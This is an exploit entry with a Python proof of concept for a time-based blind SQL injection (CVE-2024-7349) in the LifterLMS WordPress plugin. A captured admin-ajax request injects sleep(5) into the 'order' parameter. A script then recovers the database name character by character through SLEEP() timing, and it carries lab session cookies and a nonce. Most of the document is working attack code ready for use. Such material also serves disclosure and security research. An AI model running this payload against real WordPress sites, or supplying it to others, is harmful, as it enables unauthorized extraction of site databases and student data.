# Exploit Title: LifterLMS - Blind SQL Injection
# Date: 09/2024
# Exploit Author: FURKAN KARAARSLAN
# Category: Webapps
# CVE : CVE-2024-7349
# Version: 7.6.3
# Vendor: https://lifterlms.com/
# Remotely Exploitable: Yes
# Authentication Required: Yes (a high-privilege account -- PR:H in the vector below; the captured request is sent with the "root" user's wordpress_logged_in_* session cookie and a session-bound _ajax_nonce, both of which the exploit code must carry)
# CVSSv3.1 Score: 7.2 (High) - AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
# Details: https://www.byresearchers.net/2024/09/cve-2024-7349-lifterlms-775.html
############################################################################
# Request:
# POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
# Host: 127.0.0.1
# Content-Length: 168
# Accept: application/json, text/javascript, */*; q=0.01
# Content-Type: application/x-www-form-urlencoded; charset=UTF-8
# X-Requested-With: XMLHttpRequest
# sec-ch-ua-mobile: ?0
# User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36
# Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
# Cookie: wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=root%7C1718390524%7Cee9yOkzWXjmUejzFdptD9bpRqPw5aH5Zeq;
# Connection: close
#
#action=export_admin_table&handler=Students&page=1&order=ASC,sleep(5)&orderby=name&filter=&filterby=course_membership&search=&per_page=25&_ajax_nonce=98cedbc865&post_id=
############################################################################
#Exploit Code
import requests
import time
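# Target endpoint. The "/wordpress" prefix is the author's lab install path;
# adjust it to the target. The vulnerable `export_admin_table` action is
# posted to admin-ajax.php (see the captured request above).
url = "http://127.0.0.1/wordpress/wp-admin/admin-ajax.php"

# Browser-shaped headers copied from the captured request.
# `Host` and `Content-Length` are deliberately NOT listed: requests derives
# both from `url` and from the body it sends, and a stale hard-coded length
# (the original carried "168", which does not match the payloads sent below)
# is at best ignored and at worst produces a malformed request.
headers = {
    "sec-ch-ua": '"Not-A.Brand";v="99", "Chromium";v="124"',
    "Accept": "application/json, text/javascript, */*; q=0.01",
    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
    "X-Requested-With": "XMLHttpRequest",
    "sec-ch-ua-mobile": "?0",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36",
    "sec-ch-ua-platform": '"Windows"',
    "Origin": "http://127.0.0.1",
    "Sec-Fetch-Site": "same-origin",
    "Sec-Fetch-Mode": "cors",
    "Sec-Fetch-Dest": "empty",
    "Referer": "http://127.0.0.1/wordpress/wp-admin/admin.php?page=llms-reporting",
    "Accept-Encoding": "gzip, deflate, br",
    "Accept-Language": "tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7",
    # SECURITY NOTE: these are the author's lab session cookies (user "root")
    # and are only here to show the required shape. The wordpress_logged_in_*
    # value is the credential that authenticates the request; replace it with
    # a session for the target. WordPress nonces are bound to the session, so
    # the `_ajax_nonce` sent in the payload must come from the same session
    # and be refreshed together with these cookies.
    "Cookie": "wordpress_5bd7a9c61cda6e66fc921a05bc80ee93=root%7C1718390524%7Cee9yOkzWXjmUejzFdptD9bpRqPw5aH5ZeqG1XUp22lD%7Ced0ece46aaebda96ea02600b26a591f260ecdb2ec7eec146285e45b994b19c0e; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=root%7C1718390524%7Cee9yOkzWXjmUejzFdptD9bpRqPw5aH5ZeqG1XUp22lD%7C24f5e9d7acbb1e7915b89f9375a0298dfabcd5d08f0f226d3831b46abdb27f11; wp_llms_session_5bd7a9c61cda6e66fc921a05bc80ee93=1%7C%7C1718239319%7C%7C1718235719%7C%7C8ce81de66404741005a03ee3e5b747e1; wp-settings-time-1=1718217826",
    "Connection": "close",
}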
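def _time_based_oracle(payload: str, delay: float, timeout) -> bool:
    """POST *payload* to the module-level ``url``/``headers`` and report a stall.

    This is the boolean oracle behind the blind injection: the SLEEP() inside
    *payload* only fires when the injected condition is true, so a response
    that takes longer than *delay* seconds is read as "true".

    Args:
        payload: The form-encoded body carrying the injected ORDER BY expression.
        delay: Threshold in seconds; must match the SLEEP() value in *payload*.
        timeout: Passed straight to ``requests.post``; ``None`` waits forever.

    Returns:
        True when the round trip exceeded *delay* seconds.
    """
    started = time.perf_counter()
    requests.post(url, headers=headers, data=payload, timeout=timeout)
    return time.perf_counter() - started > delay


def find_db_name(max_len: int = 20, delay: float = 2, *, nonce: str = "98cedbc865",
                 timeout=None, oracle=None) -> str:
    """Recover the current MySQL database name one character at a time.

    The injection point is the ``order`` parameter of the ``export_admin_table``
    AJAX action: the value presumably lands in an ORDER BY clause, so
    ``ASC,(SELECT IF(<cond>,SLEEP(n),0))`` appends a second sort expression
    whose evaluation stalls the response only when ``<cond>`` holds. For each
    position 1..*max_len* every printable ASCII code (32..126) is tried; a
    stall means that character sits at that position.

    Args:
        max_len: Upper bound on the name length to probe (20, as in the
            original PoC).
        delay: Seconds the injected SLEEP() waits; also the threshold above
            which a response counts as a hit. Normal responses have to finish
            well under this, or the oracle false-positives.
        nonce: The ``_ajax_nonce`` value sent with the action. WordPress nonces
            are bound to the logged-in session, so take it from the same
            session whose cookies are in ``headers``.
        timeout: Per-request timeout for ``requests.post``; ``None`` waits
            forever (the original behaviour). A finite value must comfortably
            exceed *delay* or true hits raise ``requests.Timeout``.
        oracle: Optional ``callable(payload) -> bool`` replacing the HTTP
            timing oracle; mainly for testing against a fake.

    Returns:
        The recovered name. Probing stops at the first position where no
        printable character matches: SUBSTRING() past the end yields '' and
        ASCII('') is 0, which never equals a printable code, so names shorter
        than *max_len* no longer cost a full sweep of useless requests.
    """
    probe = oracle if oracle is not None else (
        lambda payload: _time_based_oracle(payload, delay, timeout)
    )

    db_name = ""
    for i in range(1, max_len + 1):
        for c in range(32, 127):
            payload = (
                "action=export_admin_table&handler=Students&page=1"
                f"&order=ASC,(SELECT IF(ASCII(SUBSTRING(DATABASE(),{i},1))={c},SLEEP({delay}),0))"
                "&orderby=name&filter=&filterby=course_membership&search=&per_page=25"
                f"&_ajax_nonce={nonce}&post_id="
            )
            # One slow response is weak evidence (network hiccup, busy server);
            # accept the character only when a second probe stalls as well.
            if probe(payload) and probe(payload):
                db_name += chr(c)
                print(f"Found character: {chr(c)} at position {i}")
                break
        else:
            # No candidate matched: we ran past the end of the name.
            break
    return db_name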
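if __name__ == "__main__":
    # Only fire the (slow, noisy) extraction when run as a script, so the
    # helpers can be imported without sending many timed requests per character.
    database_name = find_db_name()
    print(f"Database name: {database_name}")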